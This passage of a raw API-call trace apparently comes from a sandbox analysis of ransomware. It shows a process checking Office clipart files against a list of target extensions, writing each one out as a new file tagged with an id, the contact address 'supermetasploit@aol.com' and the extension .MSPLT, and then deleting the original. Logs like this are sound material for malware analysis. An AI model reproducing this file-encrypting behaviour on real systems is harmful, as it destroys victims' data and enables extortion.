(lpString1=".ppt", lpString2=".MID") returned 1 [0320.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.412] lstrlenW (lpString=".zip") returned 4 [0320.412] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.412] lstrlenW (lpString=".rar") returned 4 [0320.412] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.413] lstrlenW (lpString=".bz2") returned 4 [0320.413] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.413] lstrlenW (lpString=".7z") returned 3 [0320.413] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.413] lstrlenW (lpString=".dbf") returned 4 [0320.413] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.413] lstrlenW (lpString=".1cd") returned 4 [0320.413] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.413] lstrlenW (lpString=".jpg") returned 4 [0320.413] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.413] lstrlenW (lpString=".doc") returned 4 [0320.413] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.413] lstrlenW (lpString=".docx") returned 5 [0320.413] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0320.413] lstrlenW (lpString=".pdf") returned 4 [0320.413] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.413] lstrlenW (lpString=".xls") returned 4 [0320.413] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.413] lstrlenW (lpString=".xlsx") returned 5 [0320.413] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0320.413] lstrlenW (lpString=".ppt") returned 4 [0320.413] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.414] lstrlenW (lpString=".zip") returned 4 [0320.414] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.414] lstrlenW (lpString=".rar") returned 4 [0320.414] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.414] lstrlenW (lpString=".bz2") returned 4 [0320.414] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.414] lstrlenW (lpString=".7z") returned 3 [0320.414] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.414] lstrlenW (lpString=".dbf") returned 4 [0320.414] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.414] lstrlenW (lpString=".1cd") returned 4 [0320.414] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_02.MID") returned 68 [0320.414] lstrlenW (lpString=".jpg") returned 4 [0320.414] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.414] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.414] lstrlenW (lpString="PARNT_03.MID") returned 12 [0320.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.416] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=8538) returned 1 [0320.416] CloseHandle (hObject=0x3b0) returned 1 [0320.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid")) returned 0x220 [0320.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.416] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.416] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.417] GetLastError () returned 0x0 [0320.417] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x215a, lpOverlapped=0x0) returned 1 [0320.420] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x2160, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x2160, lpOverlapped=0x0) returned 1 [0320.422] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.422] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.422] SetEndOfFile (hFile=0x560) returned 1 [0320.422] CloseHandle (hObject=0x560) returned 1 [0320.422] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.422] SetEndOfFile (hFile=0x3b0) returned 1 [0320.429] CloseHandle (hObject=0x3b0) returned 1 [0320.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_03.mid")) returned 1 [0320.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.430] lstrlenW (lpString=".doc") returned 4 [0320.430] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.430] lstrlenW (lpString=".docx") returned 5 [0320.430] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0320.430] lstrlenW (lpString=".pdf") returned 4 [0320.430] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.430] lstrlenW (lpString=".xls") returned 4 [0320.430] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.430] lstrlenW (lpString=".xlsx") returned 5 [0320.431] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0320.431] lstrlenW (lpString=".ppt") returned 4 [0320.431] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString=".zip") returned 4 [0320.431] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.431] lstrlenW (lpString=".rar") returned 4 [0320.431] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.431] lstrlenW (lpString=".bz2") returned 4 [0320.431] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.431] lstrlenW (lpString=".7z") returned 3 [0320.431] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString=".dbf") returned 4 [0320.431] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString=".1cd") returned 4 [0320.431] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString=".jpg") returned 4 [0320.431] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.431] lstrlenW (lpString=".doc") returned 4 [0320.431] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.431] lstrlenW (lpString=".docx") returned 5 [0320.431] lstrcmpiW (lpString1=".docx", lpString2="3.MID") returned -1 [0320.432] lstrlenW (lpString=".pdf") returned 4 [0320.432] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.432] lstrlenW (lpString=".xls") returned 4 [0320.432] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.432] lstrlenW (lpString=".xlsx") returned 5 [0320.432] lstrcmpiW (lpString1=".xlsx", lpString2="3.MID") returned -1 [0320.432] lstrlenW (lpString=".ppt") returned 4 [0320.432] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.432] lstrlenW (lpString=".zip") returned 4 [0320.432] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.432] lstrlenW (lpString=".rar") returned 4 [0320.432] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.432] lstrlenW (lpString=".bz2") returned 4 [0320.432] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.432] lstrlenW (lpString=".7z") returned 3 [0320.432] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.432] lstrlenW (lpString=".dbf") returned 4 [0320.432] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.432] lstrlenW (lpString=".1cd") returned 4 [0320.432] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_03.MID") returned 68 [0320.432] lstrlenW (lpString=".jpg") returned 4 [0320.432] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.432] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.433] lstrlenW (lpString="PARNT_04.MID") returned 12 [0320.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.433] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=6070) returned 1 [0320.433] CloseHandle (hObject=0x3b0) returned 1 [0320.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid")) returned 0x220 [0320.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.434] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.434] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.435] GetLastError () returned 0x0 [0320.435] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x17b6, lpOverlapped=0x0) returned 1 [0320.659] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x17c0, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x17c0, lpOverlapped=0x0) returned 1 [0320.661] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.661] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.661] SetEndOfFile (hFile=0x560) returned 1 [0320.689] CloseHandle (hObject=0x560) returned 1 [0320.690] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.690] SetEndOfFile (hFile=0x3b0) returned 1 [0320.698] CloseHandle (hObject=0x3b0) returned 1 [0320.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_04.mid")) returned 1 [0320.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.704] lstrlenW (lpString=".doc") returned 4 [0320.704] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.704] lstrlenW (lpString=".docx") returned 5 [0320.704] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0320.704] lstrlenW (lpString=".pdf") returned 4 [0320.704] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.704] lstrlenW (lpString=".xls") returned 4 [0320.704] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.704] lstrlenW (lpString=".xlsx") returned 5 [0320.704] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0320.704] lstrlenW (lpString=".ppt") returned 4 [0320.704] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.704] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.704] lstrlenW (lpString=".zip") returned 4 [0320.704] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.704] lstrlenW (lpString=".rar") returned 4 [0320.704] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.705] lstrlenW (lpString=".bz2") returned 4 [0320.705] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.705] lstrlenW (lpString=".7z") returned 3 [0320.705] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.705] lstrlenW (lpString=".dbf") returned 4 [0320.705] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.705] lstrlenW (lpString=".1cd") returned 4 [0320.705] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.705] lstrlenW (lpString=".jpg") returned 4 [0320.705] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.705] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.705] lstrlenW (lpString=".doc") returned 4 [0320.705] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.705] lstrlenW (lpString=".docx") returned 5 [0320.706] lstrcmpiW (lpString1=".docx", lpString2="4.MID") returned -1 [0320.706] lstrlenW (lpString=".pdf") returned 4 [0320.706] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.706] lstrlenW (lpString=".xls") returned 4 [0320.706] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.706] lstrlenW (lpString=".xlsx") returned 5 [0320.706] lstrcmpiW (lpString1=".xlsx", lpString2="4.MID") returned -1 [0320.706] lstrlenW (lpString=".ppt") returned 4 [0320.706] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.706] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.706] lstrlenW (lpString=".zip") returned 4 [0320.707] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.707] lstrlenW (lpString=".rar") returned 4 [0320.707] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.707] lstrlenW (lpString=".bz2") returned 4 [0320.707] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.707] lstrlenW (lpString=".7z") returned 3 [0320.707] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0320.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.707] lstrlenW (lpString=".dbf") returned 4 [0320.707] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0320.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.707] lstrlenW (lpString=".1cd") returned 4 [0320.707] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0320.707] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_04.MID") returned 68 [0320.707] lstrlenW (lpString=".jpg") returned 4 [0320.707] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0320.708] lstrcmpiW (lpString1=".MID", lpString2=".MSPLT") returned -1 [0320.708] lstrlenW (lpString="PARNT_10.MID") returned 12 [0320.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.710] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=5393) returned 1 [0320.710] CloseHandle (hObject=0x3b0) returned 1 [0320.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid")) returned 0x220 [0320.710] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0320.710] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0320.711] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.711] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x560 [0320.712] GetLastError () returned 0x0 [0320.712] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x1511, lpOverlapped=0x0) returned 1 [0320.715] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x1520, lpOverlapped=0x0) returned 1 [0320.717] ReadFile (in: hFile=0x3b0, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0320.717] WriteFile (in: hFile=0x560, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0xec, lpOverlapped=0x0) returned 1 [0320.717] SetEndOfFile (hFile=0x560) returned 1 [0320.718] CloseHandle (hObject=0x560) returned 1 [0320.718] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0320.718] SetEndOfFile (hFile=0x3b0) returned 1 [0320.724] CloseHandle (hObject=0x3b0) returned 1 [0320.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0320.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\parnt_10.mid")) returned 1 [0320.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.726] lstrlenW (lpString=".doc") returned 4 [0320.726] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0320.726] lstrlenW (lpString=".docx") returned 5 [0320.726] lstrcmpiW (lpString1=".docx", lpString2="0.MID") returned -1 [0320.726] lstrlenW (lpString=".pdf") returned 4 [0320.726] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0320.726] lstrlenW (lpString=".xls") returned 4 [0320.726] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0320.726] lstrlenW (lpString=".xlsx") returned 5 [0320.726] lstrcmpiW (lpString1=".xlsx", lpString2="0.MID") returned -1 [0320.726] lstrlenW (lpString=".ppt") returned 4 [0320.727] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0320.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PARNT_10.MID") returned 68 [0320.727] lstrlenW (lpString=".zip") returned 4 [0320.727] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0320.727] lstrlenW (lpString=".rar") returned 4 [0320.727] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0320.727] lstrlenW (lpString=".bz2") returned 4 [0320.727] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0320.727] lstrlenW 